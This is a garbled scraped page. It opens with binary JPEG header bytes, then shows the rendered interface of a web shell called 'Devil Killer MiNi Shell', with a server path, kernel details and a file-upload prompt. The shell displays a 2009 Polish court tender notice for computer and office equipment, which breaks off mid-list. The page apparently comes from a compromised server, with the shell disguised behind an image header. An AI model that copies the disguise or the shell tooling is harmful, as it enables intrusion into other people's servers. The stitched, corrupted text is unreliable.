JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091022/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091022/185879-N-2009.html

<p class="kh_header"><b>Zielona Góra: Zad.A: Zakup i dostawa zestawów komputerowych Zad.B: Zakup i dostawa zestawu komputerowego do obsługi interesantów Zad.C: Zakup i dostawa notebooków dla sędziów Zad.D: Zakup i dostawa notebooków dla protokolanta z dodatkowym monitorem płaskim Zad.E: Zakup i dostawa drukarek laserowych 2-stronicowych Zad.F: Zakup i dostawa niszczarek Zad.G: Zakup i dostawa kserokopiarek Zad.H: Zakup i dostawa telefaksów Zad.I: Zakup i dostawa urządzeń w ramach Systemu Wspomagania Organizacji Rozpraw  Zad.J: Zakup, dostawa i montaż urządzeń do tajnej kancelarii Zad.K: Zakup i dostawa urządzeń do zabezpieczenia s</b><br>
<b>Numer ogłoszenia: 185879 - 2009; data zamieszczenia: 22.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Okręgowy w Zielonej Górze , Pl. Słowiański 1, 65-958 Zielona Góra, woj. lubuskie, tel. 068 3220155, faks 068 3220155.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zielona-gora.so.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zad.A: Zakup i dostawa zestawów komputerowych Zad.B: Zakup i dostawa zestawu komputerowego do obsługi interesantów Zad.C: Zakup i dostawa notebooków dla sędziów Zad.D: Zakup i dostawa notebooków dla protokolanta z dodatkowym monitorem płaskim Zad.E: Zakup i dostawa drukarek laserowych 2-stronicowych Zad.F: Zakup i dostawa niszczarek Zad.G: Zakup i dostawa kserokopiarek Zad.H: Zakup i dostawa telefaksów Zad.I: Zakup i dostawa urządzeń w ramach Systemu Wspomagania Organizacji Rozpraw  Zad.J: Zakup, dostawa i montaż urządzeń do tajnej kancelarii Zad.K: Zakup i dostawa urządzeń do zabezpieczenia s.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest :
Zad.A: Zakup i dostawa zestawów komputerowych dla Sądu Rejonowego w Świebodzinie
zestaw komputerowy  w ilościach 17 szt, w tym:
- komputer stacjonarny		- 17 szt,
- monitor  typ I 			- 17 szt,
Zad.B: Zakup i dostawa zestawu komputerowego do obsługi interesantów dla Sądu Rejonowego w Świebodzinie
zestaw komputerowy do obsługi interesantów w ilościach 1 szt, w tym:
- komputer stacjonarny		- 1 szt,
- monitor  typ I			- 1 szt,
Zad.C: Zakup i dostawa notebooków dla sędziów dla Sądu Rejonowego w Świebodzinie notebook dla sędziów w ilościach 8 szt, w tym:
- notebook			- 8 szt,
Zad.D: Zakup i dostawa notebooków dla protokolanta z dodatkowym monitorem płaskim dla Sądu Rejonowego w Świebodzinie
notebook dla protokolantów z dodatkowym monitorem płaskim dla sędziego 
w ilościach 4 szt, w tym:
- notebook 			- 4 szt,
- monitor typ II			- 4 szt,
Zad.E: Zakup i dostawa drukarek laserowych 2-stronicowych dla Sądu Rejonowego 
w Świebodzinie
drukarki laserowe 2- stronicowe  w ilościach 18 szt, w tym:
- drukarki    			- 18 szt,
Zad.F: Zakup i dostawa niszczarek dla Sądu Rejonowego w Świebodzinie
niszczarki w ilościach 12 szt, w tym:
- niszczarki			- 12 szt,
Zad.G: Zakup i dostawa kserokopiarek dla Sądu Rejonowego w Świebodzinie
kserokopiarki w ilościach 5 szt, w tym:
- kserokopiarki			- 5 szt,
Zad.H: Zakup i dostawa telefaksów dla Sądu Rejonowego w Świebodzinie
telefaksy w ilościach 6 szt, w tym: 
- telefaksy 			- 6 szt,
Zad.I: Zakup i dostawa urządzeń w ramach Systemu Wspomagania Organizacji Rozpraw  
w Sądzie Rejonowym w Świebodzinie, w tym:
a)wokanda elektroniczna na sale rozpraw w ilościach 7 szt, w tym:
- wokanda elektroniczna (2 sale w części modern.)	- 2 szt,
- wokanda elektroniczna (5 sal w części rozbudowa) 	- 5 szt,
b)wokanda elektroniczna zbiorcza w ilościach 1 szt, w tym:
- wokanda elektroniczna zbiorcza w rozbudowie	- 1 szt,
c)infomat w ilościach 1 szt, w tym:
- infomat		- 1 szt,
d)serwer w ilościach 1 szt, w tym: 
- serwer 		- 1 szt,
e)    przełącznik  w ilościach 1 szt, w tym:
 - przełącznik	- 1 szt,
W ramach zadania I Wykonawca zamontuje sprzęt wg ustaleń i wskazań Zamawiającego.
Zad.J: Zakup, dostawa i montaż urządzeń do tajnej kancelarii dla Sądu Rejonowego w Świebodzinie, w tym:
a)wideo domofon 	- 1 kpl,
b)	szyfrator - 1 szt,
c)	rejestrator cyfrowy- 1 szt,
d)	dysk twardy- 1 szt,
e)	monitor	- 1 kpl.
Pomieszczenie nowo oddane do użytkowania. Zamawiający zastrzega sobie, że dostawa i montaż urządzeń muszą być zrealizowane w sposób niepogarszający stan pomieszczenia kancelarii tajnej potwierdzony przez Sąd Rejonowy w Świebodzinie.
Zad.K: Zakup i dostawa urządzeń do zabezpieczenia sieci dla SR Żagań, SR Nowa Sól, SR Krosno Odrzańskie, w tym:
a)urządzenie do zabezpieczenia sieci w ilościach 3 szt, w tym:
- SR Żagań			- 1 szt,
- SR Nowa Sól			- 1 szt,
- SR Krosno Odrzańskie		- 1 szt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.23.10.00-7, 30.21.31.00-6, 30.21.33.00-8, 30.23.13.00-0, 30.12.13.00-6, 30.23.21.00-5, 30.23.30.00-1, 31.21.41.00-0, 72.26.80.00-1, 32.24.00.00-7, 32.32.30.00-3, 32.32.12.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiajacy nie żąda wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.Wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych
2.Posiadają uprawnienia do wykonywania działalności lub czynności określonej przedmiotem zamówienia jeżeli ustawy nakładają obowiązek posiadania takich uprawnień oraz udokumentują to poprzez złożenie dokumentów potwierdzających posiadanie uprawnień do wykonywania działalności związanej z przedmiotem niniejszego zamówienia publicznego,
3. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia lub przedstawiają pisemne zobowiązanie innych podmiotów do udostępniania potencjału technicznego i osób zdolnych do wykonania zamówienia oraz udokumentują do poprzez wykazanie realizacji przynajmniej jednej dostawy dla Zadania A i B, Zadania C i D, Zadania E, Zadania F, Zadania G, Zadania H, Zadania I odpowiadającym swoim rodzajem oraz wartością dostawom stanowiącym przedmiot zamówienia,
4. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
5. Złożą formularz ofertowy, formularz cenowy wraz z wymaganymi dokumentami, oświadczeniami, załącznikami oraz zaświadczeniami wymaganymi treścią SIWZ oraz opisem przedmiotu zamówienia Rozdz. III SIWZ.
6. Ocena spełnienia warunków określonych dla Wykonawców będzie dokonywana przy zastosowaniu formuły spełnia - nie spełnia. Wykonawca spełniający warunki otrzyma ocenę spełnia natomiast Wykonawca nie spełniający któregokolwiek z warunków otrzyma ocenę nie spełnia i zgodnie z art. 24 ust. 1 pkt 10 i ust. 2 pkt 2-4 ustawy Prawo zamówień publicznych zostanie wykluczony z ubiegania się o udzielenie zamówienia, a jego oferta Wykonawcy zgodnie z art. 24 ust. 4  wykluczonego uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Formularz oferty na załączniku nr 1 i formularz cenowy na załączniku nr 1a.
2.Dane Wykonawcy na załączniku nr 2.
3.Oświadczenie Wykonawcy w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych na formularzu stanowiącym załącznik nr 3 do Instrukcji dla Wykonawców.
4.W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności nie podlega wykluczeniu na podstawie art. 24 ustawy wykonawca musi przedstawić w ofercie następujące dokumenty:
a.aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej, niż 6 miesięcy przed upływem terminu składania ofert,
b.aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzonych odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego  organu - wystawionych nie wcześniej niż 3 miesiące  przed upływem terminu składania ofert,
c.aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4-8,9 ustawy wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert,
d.jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt. 4 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości;
- nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentu, o którym mowa wyżej, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
5.Oświadczenie Wykonawcy o udzieleniu gwarancji - Załącznik nr 4.
6.W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę oraz doświadczenie, potencjał techniczny, a także że dysponuje osobami zdolnymi do wykonania zamówienia, do oferty należy dołączyć następujące dokumenty:
1)Wykaz wykonanych w okresie nie dłuższym niż ostatnie trzy lata dostaw odpowiadającym swoim rodzajem oraz wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców - Załącznik nr 5. Na potwierdzenie niezbędnej wiedzy i doświadczenia Wykonawcy winni wykazać, że w ciągu ostatnich trzech lat wykonali co najmniej: jednej dostawy łącznie dla Zadania A i Zadania B - dostawy zestawów komputerowych, jednej dostawy łącznie dla Zadania C i Zadania D - dostawy notebooków, jednej dostawy dla Zadania E - dostawy drukarek, jednej dostawy dla Zadania F - dostawy niszczarek, jednej dostawy dla Zadania G - dostawa kserokopiarek, jednej dostawy dla Zadania H - dostawy telefaksów, jednej dostawy dla Zadania I - dostawy urządzeń dla Systemu Wspomagania Organizacji Rozpraw,
Do wykazu należy załączyć dokumenty potwierdzające należyte wykonanie wykazanych dostaw (np. referencje od Zamawiających).
7.W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, do oferty należy dołączyć dokumenty wymagane w opisie przedmiotu zamówienia Rozdz. III SIWZ, w tym:
1)Zaświadczenia podmiotu uprawnionego do kontroli jakości potwierdzającego, ze dostarczane produkty odpowiadają normom lub specyfikacjom technicznym,
2)Zaświadczenia niezależnego podmiotu zajmującego się poświadczeniem zgodności działań Wykonawcy z normami jakościowymi.
8.W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia:
a)zgodnie z art. 23 ust. 2 ustawy Prawo zamówień publicznych, ustanawiają pełnomocnika do reprezentowania ich w niniejszym postępowaniu o udzielenie zamówienia albo do reprezentowania w tym postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, (treść pełnomocnictwa powinna dokładnie określać zakres umocowania - wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem lub liderem, pełnomocnictwo podpisane przez obu Wykonawców winno być dołączone do oferty),
b)wypełniając formularz ofertowy jak również inne dokumenty powołujące się na Wykonawcę w miejscu np. nazwa i adres Wykonawcy należy wpisać dane dotyczące wszystkich współpartnerów, a nie ich pełnomocnika - lidera lub jednego ze współpartnerów;
c)każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia zobowiązany jest złożyć wszystkie dokumenty dotyczące właściwości Wykonawcy, o których mowa w pkt IV, ppkt 3 i  4.
9.Zgodnie z art. 26 ust. 3 ustawy Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych oświadczeń lub dokumentów potwierdzających spełnianie warunków udziału w postępowaniu oraz spełnienie przez oferowane dostawy wymagań określonych przez Zamawiającego, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane dokumenty i oświadczenia zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy podlegać będzie odrzuceniu lub konieczne byłoby unieważnienie postępowania. Złożone na wezwanie dokumenty i oświadczenia powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnienie przez oferowane dostawy wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zielona-gora.so.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Okręgowy Zielona Góra
Plac Słowianski 1
65-958 Zielona Góra.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.10.2009 godzina 10:30, miejsce: Sąd Okręgowy Zielona Góra
Plac Słowianski 1, pok. 20 (Sekretariat Prezesa Sądu Okręgowego).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zad.A: Zakup i dostawa zestawów komputerowych dla Sądu Rejonowego w Świebodzinie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad.A: Zakup i dostawa zestawów komputerowych dla Sądu Rejonowego w Świebodzinie zestaw komputerowy  w ilościach 17 szt, w tym:
- komputer stacjonarny		- 17 szt,
- monitor  typ I 			- 17 szt,.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6, 30.23.13.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zad.B: Zakup i dostawa zestawu komputerowego do obsługi interesantów dla Sądu Rejonowego w Świebodzinie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad.B: Zakup i dostawa zestawu komputerowego do obsługi interesantów dla Sądu Rejonowego w Świebodzinie
zestaw komputerowy do obsługi interesantów w ilościach 1 szt, w tym:
- komputer stacjonarny		- 1 szt,
- monitor  typ I			- 1 szt,.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.33.00-8, 30.23.13.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zad.C: Zakup i dostawa notebooków dla sędziów dla Sądu Rejonowego w Świebodzin.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad.C: Zakup i dostawa notebooków dla sędziów dla Sądu Rejonowego w Świebodzinie
notebook dla sędziów w ilościach 8 szt, w tym:
- notebook			- 8 szt,.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zakup i dostawa notebooków dla protokolanta z dodatkowym monitorem płaskim dla Sądu Rejonowego w Świebodzinie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad.D: Zakup i dostawa notebooków dla protokolanta z dodatkowym monitorem płaskimdla Sądu Rejonowego w Świebodzinie
notebook dla protokolantów z dodatkowym monitorem płaskim dla sędziego 
w ilościach 4 szt, w tym:
- notebook 			- 4 szt,
- monitor typ II			- 4 szt,.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6, 30.23.13.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zad.E: Zakup i dostawa drukarek laserowych 2-stronicowych dla Sądu Rejonowego w Świebodzinie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad.E: Zakup i dostawa drukarek laserowych 2-stronicowych dla Sądu Rejonowego 
w Świebodzinie drukarki laserowe 2- stronicowe  w ilościach 18 szt, w tym:
- drukarki    			- 18 szt,.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.21.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zad.F: Zakup i dostawa niszczarek dla Sądu Rejonowego w Świebodzinie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad.F: Zakup i dostawa niszczarek dla Sądu Rejonowego w Świebodzinie
niszczarki w ilościach 12 szt, w tym:
- niszczarki			- 12 szt,.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.21.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zad.G: Zakup i dostawa kserokopiarek dla Sądu Rejonowego w Świebodzinie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad.G: Zakup i dostawa kserokopiarek dla Sądu Rejonowego w Świebodzinie
kserokopiarki w ilościach 5 szt, w tym:
- kserokopiarki			- 5 szt,.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.30.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zad.H: Zakup i dostawa telefaksów dla Sądu Rejonowego w Świebodzinie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad.H: Zakup i dostawa telefaksów dla Sądu Rejonowego w Świebodzinie
telefaksy w ilościach 6 szt, w tym: 
- telefaksy 			- 6 szt,.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.21.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zad.I: Zakup i dostawa urządzeń w ramach Systemu Wspomagania Organizacji Rozpraw  
w Sądzie Rejonowym w Świebodzinie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad.I: Zakup i dostawa urządzeń w ramach Systemu Wspomagania Organizacji Rozpraw  
w Sądzie Rejonowym w Świebodzinie, w tym:
a)wokanda elektroniczna na sale rozpraw w ilościach 7 szt, w tym:
- wokanda elektroniczna (2 sale w części modern.)	- 2 szt,
- wokanda elektroniczna (5 sal w części rozbudowa) 	- 5 szt,
b)wokanda elektroniczna zbiorcza w ilościach 1 szt, w tym:
- wokanda elektroniczna zbiorcza w rozbudowie	- 1 szt,
c)infomat w ilościach 1 szt, w tym:
- infomat			- 1 szt,
d)serwer w ilościach 1 szt, w tym: 
- serwer 			- 1 szt,
e)    przełącznik  w ilościach 1 szt, w tym:
- przełącznik		- 1 szt,
W ramach zadania I Wykonawca zamontuje sprzęt wg ustaleń i wskazań Zamawiającego..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.10.00-7, 31.21.41.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zad.J: Zakup, dostawa i montaż urządzeń do tajnej kancelarii dla Sądu Rejonowego w Świebodzinie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad.J: Zakup, dostawa i montaż urządzeń do tajnej kancelarii dla Sądu Rejonowego w Świebodzinie, w tym:
a)wideo domofon 		- 1 kpl,
b)szyfrator 		- 1 szt,
